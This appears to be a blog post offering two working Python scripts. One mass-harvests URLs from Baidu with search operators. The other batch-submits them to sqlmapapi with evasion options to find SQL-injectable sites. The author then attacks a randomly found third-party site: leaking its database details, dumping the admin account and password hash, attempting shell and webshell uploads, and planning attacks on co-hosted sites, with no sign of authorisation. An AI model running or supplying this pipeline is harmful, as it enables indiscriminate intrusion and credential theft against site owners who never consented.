A small tool for laid-back batch SQL injection testing


       Anyone who does penetration testing knows sqlmap. It is powerful (if not always accurate), but it scans only one URL at a time, and typing commands one by one is inefficient. Even with the -m option, one task must finish before the next can begin, so throughput is still poor. That is why the project ships sqlmapapi.py, which exposes an API for running scan tasks in batches; the internals are not covered here, and interested readers can google the details.

      1. Crawling target sites in bulk: batch scanning with sqlmap is solved, but where do the URLs come from? Anyone who has written a crawler will know: scrape a search engine. Search engines offer powerful operators, such as site: and inurl:, that let you narrow the results to target sites. For well-known reasons, Baidu is used as the example here; the Python code for crawling target URLs is shared below:

#coding: utf-8
import requests,re,threading
import time
from bs4 import BeautifulSoup as bs
from queue import Queue
from argparse import ArgumentParser

arg = ArgumentParser(description='baidu_url_collection')
arg.add_argument('keyword',help='inurl:.asp?id=1')
arg.add_argument('-p', '--page', help='page count', dest='pagecount', type=int)
arg.add_argument('-t', '--thread', help='the thread_count', dest='thread_count', type=int, default=10)
arg.add_argument('-o', '--outfile', help='the file save result', dest='outfile', default='result.txt')
result = arg.parse_args()

headers = {'User-Agent':'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)'}

class Bd_url(threading.Thread):
    def __init__(self, que):
        threading.Thread.__init__(self)
        self._que = que

    def run(self):
        while not self._que.empty():
            URL = self._que.get()
            try:
                self.bd_url_collect(URL)
            except Exception as e:
                print ('Exception: ',e)
                pass

    def bd_url_collect(self, url):
        # fetch one Baidu result page and parse out the result links
        r = requests.get(url, headers=headers, timeout=5)
        soup = bs(r.content, 'lxml', from_encoding='utf-8')
        bqs = soup.find_all(name='a', attrs={'data-click': re.compile(r'.'), 'class': None})
        for bq in bqs:
            # follow the Baidu redirect to recover the real target URL
            r = requests.get(bq['href'], headers=headers, timeout=5)
            if r.status_code == 200:
                print(r.url)
                with open(result.outfile, 'a') as f:
                    f.write(r.url + '\n')

def main():
    thread = []
    thread_count = result.thread_count
    que = Queue()
    # Baidu's pn parameter is a result offset (10 results per page)
    for i in range(result.pagecount):
        que.put('https://www.baidu.com/s?wd=' + result.keyword + '&pn=' + str(i * 10))

    for i in range(thread_count):
        thread.append(Bd_url(que))

    for i in thread:
        i.start()

    for i in thread:
        i.join()

if __name__ == '__main__':

    start = time.perf_counter()
    main()
    end = time.perf_counter()

    with open(result.outfile, 'r') as f:
        urlcount = len(f.readlines())

    with open(result.outfile, 'a') as f:
        f.write('--------use time:' + str(end - start) + '-----total url: ' + str(urlcount) + '----------------')

    print("total url: " + str(urlcount))
    print(str(end - start) + "s")
    

        Using the code is simple, e.g.: python crawler.py -p 1000 -t 20 -o url.txt "inurl:php?id=10". The arguments are, in order: the number of result pages to crawl, the number of threads, the file the URLs are saved to, and the keyword the URLs must match. When it finishes, a url.txt file containing the crawled URLs is created in the same directory.
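As an aside, the crawler interpolates the keyword into the query string without URL-encoding it, and Baidu's pn parameter is a result offset rather than a page number. A minimal sketch of building properly encoded page URLs, assuming the 10-results-per-page offset convention (the helper name here is mine, not part of the scripts above):

```python
from urllib.parse import quote

def baidu_page_urls(keyword, pages):
    """Build one Baidu search URL per result page, with the dork URL-encoded."""
    base = 'https://www.baidu.com/s?wd={}&pn={}'
    # pn is an offset: page i starts at result i * 10
    return [base.format(quote(keyword), i * 10) for i in range(pages)]

urls = baidu_page_urls('inurl:php?id=', 3)
# offsets produced: 0, 10, 20
```

Encoding the dork matters because characters like `?` and `=` inside the keyword would otherwise be parsed as part of the search URL's own query string.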

   2. Now that we have the URLs, how do we push them to sqlmapapi? Starting sqlmapapi takes a single command: open a new cmd window and, in the same directory as sqlmap.py, run python sqlmapapi.py -s. The server then listens for commands on port 8775, as shown:

   With the service running, the last step is to send the URLs in bulk. A Python script for that is below:

# -*- coding: utf-8 -*-
import os
import sys
import json
import time
import requests

def usage():
    print ('+' + '-' * 50 + '+')
    print ('\t   Python sqlmapapi')
    print ('\t   Code BY:zhoumo')
    print ('+' + '-' * 50 + '+')
    if len(sys.argv) != 2:
        print ("example: sqlmapapi_test.py url.txt")
        sys.exit()

def task_new(server):
    url = server + '/task/new'
    req = requests.get(url)
    taskid = req.json()['taskid']
    success = req.json()['success']
    return (success,taskid)

def task_start(server,taskid,data,headers):
    url = server + '/scan/' + taskid + '/start'
    req = requests.post(url,json.dumps(data),headers = headers)
    success = req.json()['success']
    return success

def task_status(server,taskid):
    url = server + '/scan/' + taskid + '/status'
    req = requests.get(url)
    status_check = req.json()['status']
    return status_check

def task_log(server,taskid):
    url = server + '/scan/' + taskid + '/log'
    req = requests.get(url).text
    scan_json = json.loads(req)['log']
    flag1 = 0
    if scan_json:
        print (scan_json[-1]['message'])
        if 'retry' in scan_json[-1]['message']:
            flag1 = 1
        else:
            flag1 = 0
    return flag1

def task_data(server,taskid):
    url = server + '/scan/' + taskid + '/data'
    req = requests.get(url)
    vuln_data = req.json()['data']
    if len(vuln_data):
        vuln = 1
    else:
        vuln = 0
    return vuln

def task_stop(server,taskid):
    url = server + '/scan/' + taskid + '/stop'
    req = requests.get(url)
    success = req.json()['success']
    return success

def task_kill(server,taskid):
    url = server + '/scan/' + taskid + '/kill'
    req = requests.get(url)
    success = req.json()['success']
    return success

def task_delete(server,taskid):
    url = server + '/scan/' + taskid + '/delete'
    requests.get(url)

def get_url(urls):
    # keep only URLs with a query string, deduplicated
    newurl = []
    for url in urls:
        if '?' in url and url not in newurl:
            newurl.append(url)
    return newurl

if __name__ == "__main__":
    usage()
    with open(sys.argv[1]) as f:
        targets = [x.rstrip() for x in f]
    targets = get_url(targets)
    server = 'http://127.0.0.1:8775'
    headers = {'Content-Type':'application/json'}
    i= 0
    vuln = []

    for target in targets:
        try:
            data = {"url":target,'batch':True,'randomAgent':True,'tamper':'space2comment','tech':'BT','timeout':15,'level':1}
            i = i + 1
            flag = 0

            (new,taskid) = task_new(server)
            if new:
              print ("scan created")
            if not new:
                print ("create failed")
            start = task_start(server,taskid,data,headers)
            if start:
                print ("--------------->>> start scan target %s" % i)
            if not start:
                print ("scan can not be started")

            start_time = time.time()  # overall timer, started once before polling
            while start:
                status = task_status(server,taskid)
                if status == 'running':
                    print ("scan running:")
                elif status == 'terminated':
                    print ("scan terminated\n")
                    data = task_data(server,taskid)
                    if data:
                        print ("--------------->>> congratulation! %s is vuln\n" % target)
                        f = open('injection.txt','a')
                        f.write(target+'\n')
                        f.close()
                        vuln.append(target)
                    if not data:
                        print ("--------------->>> the target is not vuln\n")
                    task_delete(server,taskid)
                    break
                else:
                    print ("scan get some error")
                    break

                time.sleep(10)
                flag1 = task_log(server,taskid)
                flag = (flag + 1)*flag1

                if (time.time() - start_time > 30) or (flag == 2):  # overall scan timeout and connection-retry limit
                    print ("there maybe a strong waf or time is over,i will abandon this target.")
                    stop = task_stop(server,taskid)
                    if stop:
                        print ("scan stopped")
                    if not stop:
                        print ("the scan can not be stopped")
                    kill = task_kill(server,taskid)
                    task_delete(server,taskid)
                    if kill:
                        print ("scan killed")
                    if not kill:
                        print ("the scan can not be killed")
                    break
        except Exception as e:
            print ('Exception: ', e)

    for each in vuln:
        print (each + '\n')

  Usage is simple: from cmd, run python sqlmap_bactch.py url.txt. The script sends the URLs the crawler collected to port 8775 on localhost, and sqlmapapi then checks each one for SQL injection.

  When the run finishes, any URL found to be injectable is written to an injection.txt file in the same directory, listing the sites with SQL injection vulnerabilities. I got lucky this time and found two.


   3. Pick one of the sites at random and verify by hand: the page opens normally with the original URL.

   Append a single quote after id=10 and see what happens. I don't know what the developers were thinking, but the page leaks two key pieces of information outright: (1) the backend is MySQL, and (2) the current SQL query, in which the database name is also visible. That alone says something about the developers' security awareness. One small detail, though: the single quote I entered was escaped with a backslash in the SQL statement, so security was at least considered at some point........
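That manual probe can be roughly automated. The sketch below only checks a response body for common MySQL error signatures; the pattern list is illustrative rather than exhaustive, and in practice you would first fetch the page with the quote appended:

```python
import re

# Illustrative (not exhaustive) MySQL error signatures
MYSQL_ERRORS = [
    r"You have an error in your SQL syntax",
    r"Warning.*mysqli?_",
    r"supplied argument is not a valid MySQL",
]

def looks_like_mysql_error(body):
    """Return True if the response body matches a known MySQL error pattern."""
    return any(re.search(p, body, re.I) for p in MYSQL_ERRORS)

# In practice, something like:
#   r = requests.get(url + "'", timeout=5)
#   if looks_like_mysql_error(r.text): ...
```

Error-based detection like this only catches the noisiest targets; blind and time-based cases still need sqlmap's techniques.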


   The rest is easy: run it through sqlmap, which confirmed four injection techniques:


  Next, enumerate the database names:


   We can even get a sql-shell: the admin table exposes the account, though the password is an MD5 hash rather than plaintext; the last login time and IP are recorded as well. (A quick aside: since the IP is logged, that may be another injection point, e.g. capture the request with Burp and tamper with the X-Forwarded-For header.)
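To expand on that aside: if the application writes the client IP into the database, the header carrying it is attacker-controlled input too. A minimal sketch of building such a probe request (the target URL is a placeholder and the request is only constructed here, not sent):

```python
import urllib.request

def xff_probe(url, payload="1.2.3.4'"):
    """Build a GET request whose X-Forwarded-For header carries a test value."""
    # the payload plants a quote where the app may log the 'client IP'
    return urllib.request.Request(url, headers={'X-Forwarded-For': payload})

req = xff_probe('http://example.com/item.php?id=10')
# urllib normalizes stored header names, e.g. 'X-forwarded-for'
```

With sqlmap itself, header injection points can also be reached by raising --level or by marking the header value with * in a request file passed via -r.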


     Getting an os-shell was not as smooth, though: uploading a file failed in every directory I tried.


       A check with --privileges shows why: as suspected, the current user has nothing but USAGE.....


       A one-line webshell could not be written either:


   Under the current conditions I can't see a way to escalate privileges or write a webshell, and I don't know how to find the absolute path of the web root (so there would be nowhere to put a shell anyway); I'm setting this aside for now.

      Through fofa, I found the site runs thinkPHP; as a follow-up I'll try the known vulnerabilities in that framework.


  Several other sites share the same IP address. Might they be vulnerable too, or allow uploading a shell? I'll try them later as well.


Reference: 1. https://www.cnblogs.com/BxScope/p/10883422.html (a packet-capture analysis of how sqlmap obtains an os-shell)

